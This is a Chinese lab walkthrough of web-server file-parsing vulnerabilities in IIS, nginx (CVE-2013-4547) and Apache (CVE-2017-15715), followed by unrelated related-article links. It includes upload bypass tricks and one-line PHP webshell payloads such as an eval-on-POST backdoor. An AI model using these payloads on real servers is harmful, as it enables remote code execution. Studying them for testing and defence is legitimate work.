【文件解析漏洞】

news2024/11/16 1:20:58

使用windows2003sever服务器

第一个:目录解析

1、打开网站目录,右键打开资源管理器

新建一个1.asp文件

在1.asp目录下新建一个2.txt,输入asp的语句

2、使用本机访问windows2003的IP地址

访问http://192.168.189.155/1.asp/2.txt即可

第二个:畸形文件解析

1、右键打开资源管理器,新建一个1.asp;jpg文件

2、访问http://192.168.189.155/1.asp;jpg

第三个:IIS7.X

在phpstudy的官网下载一个IIS版本的phpstudy

启动打开配置文件修改一下

将前面的分号去掉。

打开IIS管理器

双击进入处理程序映射

配置如下

打开根目录

新建一个jpg文件,在记事本中编辑写入一句话木马<?php eval(phpinfo());?>

浏览器访问8980端口http://localhost:8980/1.jpg/.php

nginx漏洞解析

第四个:apache_parsing关卡

1、上传一个有一句话木马的jpg文件

直接上传发现不行

在文件中加上图片头GIF89a

2、访问http://124.221.58.83:8088/uploadfiles/f3ccdd27d2000e3f9255a7e3e2c48800.jpg/.php

因为是使用的post传输,所以需要使用浏览器的一个插件hackber,输入命令查看,成功

输入系统命令cmd=(system('ls'))可以查看目录下的文件

第五个:CVE-2013-4547关卡

上传一句话木马的jpg文件,抓包

GIF89a
<?php fputs(fopen('yuanzhang.php',w),'<?php @eval($_POST['cmd']); ?>

在jpg后面加l两个空格

将后面的20改为00,放包

访问如下,在1.jpg后面加两个空格抓包

将%20%20改为两个空格

将20改为00

放包后访问成功

Apache解析漏洞

第六个:apache_parsing关卡

直接上传.php.jpg文件

直接访问

第七个:CVE-2017-15715关卡

直接提交php文件发现不行

抓包修改,在evil.php后面加一个空格

在hex里修改20为0a

访问/evil.php%0a

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1964259.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Minio多主机分布式 docker-compose 集群部署

参考 docker-compose搭建多主机分布式minio - 会bk的鱼 - 博客园 (cnblogs.com) 【运维】docker-compose安装minio集群-CSDN博客 Minio 是个基于 Golang 编写的开源对象存储套件&#xff0c;虽然轻量&#xff0c;却拥有着不错的性能 中文地址&#xff1a;MinIO | 用于AI的S3 …

CDP问卷调查

在数字化时代&#xff0c;CDP&#xff08;Customer Data Platform&#xff0c;客户数据平台&#xff09;作为连接企业与客户数据的关键桥梁&#xff0c;正逐渐成为企业营销策略中不可或缺的一环。为了更深入地理解CDP在企业中的应用现状、挑战与未来趋势&#xff0c;我们精心设…

A股探底强势反攻,量价齐声太漂亮

今天的A股探底回升&#xff0c;太阳线反攻&#xff0c;太漂亮了&#xff01;具体原因是这样的&#xff0c;盘面上出现2个重要变化&#xff0c;一起来看看&#xff1a; 1、今天两市低开高走&#xff0c;证券、人形机器人等板块掀起涨停潮&#xff0c;究竟是昙花一现还是有望迎来…

VMware虚拟机安装及虚拟机下安装ubuntu(附安装包)

VMware虚拟机安装及虚拟机下安装ubuntu 0 前期准备1 VMware安装2 VMware虚拟机下安装ubuntu2.1 配置虚拟机2.2 安装虚拟机ubuntu 3 在虚拟机中卸载Ubuntu参考 0 前期准备 1、VMware Wworkstation Pro安装包下载 官网-添加链接描述 百度网盘分享&#xff1a; 链接: VMware 提取…

【ThingsBoard初体验】本地编译踩坑记录

前言 这只是我自己的踩坑记录&#xff0c;以尽快启动项目为主&#xff0c;暂时不对编译出现的问题做深入分析。 第一次接触物联网项目&#xff0c;对于文章出现的问题&#xff0c;如果能帮到其他小伙伴&#xff0c;那是我的荣幸。 大佬们有更好的解决办法&#xff0c;也希望能够…

TypeError: Components is not a function

Vue中按需引入Element-plus时&#xff0c;报错TypeError: Components is not a function。 1、参考Element-plus官方文档 安装unplugin-vue-components 和 unplugin-auto-import这两款插件 2、然后需要在vue.config.js中配置webPack打包plugin配置 3、重新启动项目会报错 T…

消息中间件分享

消息中间件分享 1 为什么使用消息队列2 消息队列有什么缺点3 如何保证消息队列的高可用4 如何处理消息丢失的问题?5 如何保证消息的顺序性1 为什么使用消息队列 解耦、异步、削峰 解耦 不使用中间件的场景 使用中间件的场景 异步 不使用中间件 使用中间件 削峰 不使…

【redis】redis高可用 哨兵模式 一主二从三哨兵部署教程

哨兵模式&#xff1a;自动主从同步、自动选举主节点&#xff1b;基本可以满足大部分业务场景&#xff1b; 在针对大规模数据和高并发请求的场景、数据不能丢失&#xff0c;才需要用到集群模式。 本文教程基于redis3 , centos 8 stream操作系统&#xff0c;理论上来说 redis3也好…

利用 Python 制作图片轮播应用

在这篇博客中&#xff0c;我将向大家展示如何使用 xPython 创建一个图片轮播应用。这个应用能够从指定文件夹中加载图片&#xff0c;定时轮播&#xff0c;并提供按钮来保存当前图片到收藏夹或仅轮播收藏夹中的图片。我们还将实现退出按钮和全屏显示的功能。 C:\pythoncode\new\…

http协议深度解析——网络时代的安全与效率(1)

作者简介&#xff1a;一名云计算网络运维人员、每天分享网络与运维的技术与干货。 公众号&#xff1a;网络豆云计算学堂 座右铭&#xff1a;低头赶路&#xff0c;敬事如仪 个人主页&#xff1a; 网络豆的主页​​​​​ 目录 写在前面&#xff1a; 本章目的&#xff1a; …

【Python学习手册(第四版)】学习笔记11.1-赋值语句(分解赋值、序列赋值、解包等)及变量命名规则详解

个人总结难免疏漏&#xff0c;请多包涵。更多内容请查看原文。本文以及学习笔记系列仅用于个人学习、研究交流。 本文主要对赋值语句的各种形式做详解&#xff0c;以非常通俗易懂的语言、循序渐进的方式&#xff0c;分别对单个、元组及列表分解、序列赋值、序列解包、多重目标…

LinuxCentos中ELK日志分析系统的部署(详细教程8K字)附图片

&#x1f3e1;作者主页&#xff1a;点击&#xff01; &#x1f427;Linux基础知识(初学)&#xff1a;点击&#xff01; &#x1f427;Linux高级管理防护和群集专栏&#xff1a;点击&#xff01; &#x1f510;Linux中firewalld防火墙&#xff1a;点击&#xff01; ⏰️创作…

Android发布Library至mavenCentral遇到 Received status code 401

一、由于我的AppUpdate 库最新的版本还是去年发布的&#xff0c;所以想着发布一个版本&#xff0c;可没想到什么都没有改动的情况下竟然返回401&#xff1b;检查了半天发现用户名和密码也没有错&#xff0c;百思不得解&#xff01; 二、最后没想到竟然是sonatype那边改了&#…

常见的Markdown编辑器推荐!

工欲善其事&#xff0c;必先利其器。一款好用的 Markdown 编辑器能极大地提高我们的写作体验&#xff0c;本篇博客就来介绍一些好用的编辑器。 ‍ ‍ Markdown 编辑器的分类 根据 Markdown 编辑器的使用环境&#xff0c;可以简单分为四类&#xff1a; 在线编辑器&#xff…

类和对象(中 )C++

默认成员函数就是用户不显示实现&#xff0c;编译器会自动实现的成员函数叫做默认成员函数。一个类&#xff0c;我们在不写的情况下&#xff0c;编译器会自动实现6个默认成员函数&#xff0c;需要注意&#xff0c;最重要的是前4个&#xff0c;其次就是C11以后还会增加两个默认成…

SpringBoot 优雅实现超大文件上传

​ 博客主页: 南来_北往 系列专栏&#xff1a;Spring Boot实战 前言 文件上传是一个老生常谈的话题了&#xff0c;在文件相对比较小的情况下&#xff0c;可以直接把文件转化为字节流上传到服务器&#xff0c;但在文件比较大的情况下&#xff0c;用普通的方式进行上传&…

hadoop学习笔记2-hdfs

3.HDFS 3.1HDFS两类节点 namenode&#xff1a;名称节点datanode&#xff1a;数据节点 1.namenode 1&#xff09;namenode用来存储元数据&#xff0c;接收客户端的读写请求&#xff0c;namenode的元数据会分别保存在磁盘和内存中&#xff0c;保存到内存是为了快速查询数据信…

一文让你学会python:面向对象

面向对象编程&#xff08;OOP&#xff09; 一.类与实例 1.类&#xff1a; 是对现实世界描述的一种类型&#xff0c;是抽象的&#xff0c;是实例的模板&#xff0c;类名采用大驼峰&#xff0c;定义方式为 class 类名: pass 。 2.实例&#xff1a; 根据类创建的具体对象&…

昇思25天学习打卡营第25天 | Pix2Pix实现图像转换

Pix2Pix实现图像转换 Pix2Pix概述 Pix2Pix是一种基于条件生成对抗网络&#xff08;cGAN, Condition Generative Adversarial Networks&#xff09;的图像转换模型&#xff0c;由Phillip Isola等人在2017年提出。它能够将语义/标签图像转换为真实图片、灰度图转换为彩色图、航空…

永劫无间:排位赛游戏攻略大全!VMOS云手机辅助攻略!

在《永劫无间》中&#xff0c;排位赛和金乌玩法是提升实力和展示技巧的绝佳途径。以下是详细的攻略建议&#xff0c;帮助玩家在游戏中取得更好的成绩。 排位赛 英雄们齐聚“聚窟洲”&#xff0c;为争夺“不朽面具”展开激烈的战斗。排位赛是玩家展示实力的重要平台&#xff0c…